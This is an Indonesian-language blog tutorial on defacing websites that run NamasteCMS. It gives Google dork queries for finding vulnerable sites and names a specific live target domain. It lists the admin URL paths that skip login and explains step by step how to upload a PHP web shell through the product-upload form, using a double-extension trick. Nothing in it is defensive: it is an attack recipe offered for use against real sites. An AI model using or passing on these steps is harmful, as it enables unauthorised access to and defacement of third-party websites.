Tutorial Deface Namastecms Admin Mistake Vulnerability

Namaste merupakan nama dari sebuah cms yang digunakan oleh beberapa web terutama web india kebetulan namastecms sendiri memiliki beberapa jenis kerentanan salah satunya bypas sql login dan admin mistake, di beberapa blog yang ada di google seringkali muncul mereka menyebut nya deface poc namastecms.

Menurut saya sendiri penyebutan itu salah karna namastecms memiliki kerentanan terhadap bypas sql login dan admin mistake akan lebih tepat jika disebut namastecms authentication bypas sql login ataupun namastecms admin mistake vulnerability, oke sekarang kita langsung saja ke tutorial nya. 

Cara Deface Namastecms Admin Mistake Vulnerability

Saya anggap kalian sudah memiliki bahannya yaitu shell backdor jika belum punya kalian bisa dowload disini.

Untuk dorknya sebagai berikut:

"Code negara" inurl:p-detail.php? 
"Code negara" inurl:p-detail.php intext:bharat
"Code negara" inurl:p-detail.php intext:gallery
Code negara bisa kalian ubah sesuai negara target contoh kalo narget india kalian ubah "+91" inurl:p-detail.php? Paham kan?

Live target:

pruthapolymer.com/

exploit nya: 
/admincms/admin.php
/namastecms/admin.php

1. Silahkan kalian ngedork terlebih dahulu atau memakai target dari gua 
2. Kalo sudah kalian pasang xploitnya di belakang web target jadi begini pruthapolymer.com/admincms/admin.php kalian akan otomatis dibawa ke dashboard admin 
3. Silahkan kalian cari tempat upload dan upload shell kalian dengan ext: php,php5 ataupun doble php seperti ini shell.php.PHP kalian upload bisa di product dll
4. Kalo sudah silahkan kalian cari shell kalian di list product jika kalian upload lewat add product. 
5. Done

Sekian dulu tutorial kali ini semoga bermanfaat, jangan lupa share artikel ke teman-teman kalian supaya kebagian ilmu walaupun tidak seberapa. 

Thanks for reading Tutorial Deface Namastecms Admin Mistake Vulnerability. Please share...!

Share :